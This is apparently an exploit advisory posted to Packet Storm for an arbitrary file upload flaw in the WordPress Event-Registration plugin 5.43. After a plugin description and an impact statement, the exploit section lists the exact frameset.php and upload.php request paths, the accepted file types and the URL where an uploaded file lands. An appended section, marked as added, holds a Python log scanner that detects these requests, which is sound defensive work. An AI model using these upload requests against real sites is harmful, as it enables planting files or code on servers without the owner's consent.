
WordPress Event-Registration 5.43 Arbitrary File Upload

Posted Mar 30, 2020
Authored by KingSkrupellos

WordPress Event-Registration plugin version 5.43 suffers from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
SHA-256 | 2029bbf836e7de4bb57eb88c7f5f10198718d2552a017080a1b57d33050ff81d

####################################################################

# Exploit Title : WordPress Event-Registration Plugins 5.43 Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/03/2020
# Vendor Homepage : wp-event-organiser.com
# Software Links : captainform.com/wordpress-event-registration-plugin/
wordpress.org/plugins/registrations-for-the-events-calendar/
edgetechweb.com
eventregistrationpro.com
# Software Version :
Requires at least: 2.0.2
Tested up to: 3.0.2
Software Affected Version : 5.42 - 5.43
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
This plugin is designed to allow you to take online registrations for events and classes.
Supports Paypal, Google Pay, MonsterPay or Authorize.net online payment sites for online collection of event fees.
This WordPress plugin is designed to run on a WordPress website and provide registration for events, classes, or parties.
It allows you to capture the registering person's contact information and any additional information
you request to a database and provides an association to an events database.
It provides the ability to send the registrant to either a Paypal, Google Pay, Monster Pay,
or Authorize.net online payment site for online collection of event fees.
Additionally it allows support for checks and cash payments.
Optional Captcha field on registration form.
Detailed payment management system to track and record event payments.
Reporting features provide an export list(s) of events, attendees, payments in Excel or CSV.
Events can be created in an Excel spreadsheet and uploaded via the event upload tool.
Dashboard widget allows for quick reference to events from the dashboard.
Inline menu navigation allows for ease of use.

== Installation ==

1. After unzipping, upload everything in the `Events Registration`
folder to your `/wp-content/plugins/` directory (preserving directory structure).
2. Activate the plugin through the 'Plugins' menu in WordPress.
3. Go to the Event Registration Menu and Configure Organization and enter your company info -
note you will need a paypal id if you plan on accepting paypal payments
4. Go to the Event Setup and create a new event, make sure you select 'make active'.
5. Create a new page (not post) on your site. Put `{EVENTREGIS}` in it on a line by itself.
6. Note: if you are upgrading from a previous version, please back up your data prior to the upgrade.

####################################################################

# Impact :
***********
WordPress Event-Registration Plugins 5.43 is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/Select%20file&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/upload.php?path=/home/[DIRECTORY-NAME-HERE]/public_html/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files

Valid extensions: gif, jpg, htm, html, pdf, zip
Max upload size: 10 MB

Directory File Path :
**********************
/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/[YOURFILENAME].html
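
For defenders, the request paths listed above make a compact log signature. The following added example (not part of the original advisory) scans web-server access logs in Combined Log Format for requests under the plugin's file manager directory; the sample log lines, IP addresses, file name and label names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Path prefix from the advisory: the TinyMCE file manager bundled with the plugin.
FM_PREFIX = "/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/"
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(method, target):
    """Label a request that touches the file manager; None for anything else."""
    path = unquote(urlsplit(target).path)
    path = re.sub(r"/{2,}", "/", path).lower()  # normalise // and case variants
    if not path.startswith(FM_PREFIX):
        return None
    rest = path[len(FM_PREFIX):]
    if rest == "upload.php":
        return "upload-post" if method == "POST" else "upload-form"
    if rest == "frameset.php":
        return "filemanager-ui"
    if rest.startswith("files/") and rest.endswith((".htm", ".html")):
        return "served-html"  # HTML served from the plugin's upload directory
    return "filemanager-other"

def scan(lines):
    """Return (ip, time, status, label) for every log line under FM_PREFIX."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, ts, method, target, status = m.groups()
            label = classify(method, target)
            if label:
                findings.append((ip, ts, int(status), label))
    return findings

def reachable(findings):
    """Findings the server answered with 2xx: the file manager is exposed."""
    return [f for f in findings if 200 <= f[2] < 300]

# Constructed sample log lines (documentation IP ranges, invented file name).
SAMPLE = [
    '203.0.113.7 - - [30/Mar/2020:10:01:02 +0000] "GET ' + FM_PREFIX + 'frameset.php?a=b HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.7 - - [30/Mar/2020:10:01:09 +0000] "POST ' + FM_PREFIX + 'upload.php?path=/x HTTP/1.1" 200 90 "-" "-"',
    '198.51.100.4 - - [30/Mar/2020:10:02:00 +0000] "GET /wp-content//plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/files/Sample.HTML HTTP/1.1" 200 77 "-" "-"',
    '192.0.2.9 - - [30/Mar/2020:10:03:00 +0000] "GET ' + FM_PREFIX + 'upload.php HTTP/1.1" 403 0 "-" "-"',
    '192.0.2.9 - - [30/Mar/2020:10:03:05 +0000] "GET /wp-login.php HTTP/1.1" 200 900 "-" "-"',
]
if __name__ == "__main__":
    print(*reachable(scan(SAMPLE)), sep="\n")
```

Any 2xx finding means the bundled file manager answered that client; removing the directory or denying access to it at the web server stops all of these request types.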

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################